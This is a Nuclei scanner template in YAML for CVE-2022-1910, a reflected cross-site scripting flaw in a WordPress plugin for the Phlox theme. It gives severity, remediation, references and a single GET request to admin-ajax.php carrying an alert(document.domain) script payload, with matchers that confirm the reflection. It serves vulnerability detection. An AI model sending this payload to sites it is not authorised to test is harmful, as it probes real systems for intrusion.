nuclei-templates/http/cves/2022/CVE-2022-1910.yaml

53 lines
2.2 KiB
YAML

id: CVE-2022-1910
info:
name: WordPress Shortcodes and Extra Features for Phlox <2.9.8 - Cross-Site Scripting
author: Akincibor
severity: medium
description: |
WordPress Shortcodes and extra features plugin for the Phlox theme before 2.9.8 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
remediation: |
Update to the latest version of the WordPress Shortcodes and Extra Features for Phlox plugin (2.9.8 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/8afe1638-66fa-44c7-9d02-c81573193b47
- https://wordpress.org/plugins/auxin-elements/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1910
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-1910
cwe-id: CWE-79
epss-score: 0.00119
epss-percentile: 0.45913
cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: averta
product: shortcodes_and_extra_features_for_phlox_theme
framework: wordpress
tags: wordpress,xss,auxin-elements,wpscan,cve,cve2017,wp-plugin,wp,averta
http:
- method: GET
path:
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'widget-title"><script>alert(document.domain)</script></h3>'
- 'aux-widget'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100f76e8b7fb3a766aaf23b24eb3bf795e2c4f4013b51d3d5071b5d43c8d21a2f3d02200b3719cd99d46a9648164f445383ddcea898d8416f0e7430a81cd5c927a8668b:922c64590222798bb761d5b6d8e72950